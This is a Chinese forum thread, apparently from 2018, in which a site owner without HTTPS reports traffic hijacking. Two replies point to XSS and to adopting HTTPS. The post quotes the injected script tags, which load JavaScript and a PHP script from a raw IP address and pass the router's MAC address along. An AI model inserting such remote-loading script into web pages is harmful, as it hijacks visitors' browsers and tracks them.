这是一个创建于 2062 天前的主题,其中的信息可能已经有所发展或是发生改变。
自己用 vps 搭建了个网站,里面有些自己需要的爬虫数据和一些小玩意,没有上 https。
遇到过很多次被运营商劫持插入了些 js 什么的,自己也没怎么在意。
但刚刚发现被劫持插入的 js 代码如下:
<script src="http://45.126.123.80:118/j.js?MAC=CC81XXXXXXXX"></script>
点开之后里面是这样的
document.writeln("<script src=\'http://45.126.123.80:118/t.php\'></script>");
然后继续点开的 php 代码我也看不懂。我不明白的是,为什么他要这样绕一层。
还有个我不明白的问题,他是怎么拿到我路由器的 MAC 地址的(我是通过楼下房东家的网络上网的,房东拉了根网线上来)。
有没有大佬能指导下~~~ T T
遇到过很多次被运营商劫持插入了些 js 什么的,自己也没怎么在意。
但刚刚发现被劫持插入的 js 代码如下:
<script src="http://45.126.123.80:118/j.js?MAC=CC81XXXXXXXX"></script>
点开之后里面是这样的
document.writeln("<script src=\'http://45.126.123.80:118/t.php\'></script>");
然后继续点开的 php 代码我也看不懂。我不明白的是,为什么他要这样绕一层。
还有个我不明白的问题,他是怎么拿到我路由器的 MAC 地址的(我是通过楼下房东家的网络上网的,房东拉了根网线上来)。
有没有大佬能指导下~~~ T T
 |
1
Fulcrum 2018-09-18 08:50:27 +08:00 via Android
小心是 XSS 攻击
|
 |
2
MOONYANYI 2018-09-18 08:51:14 +08:00 via Android  1
还是上个 https 吧,反正现在免费的多
|
Select Language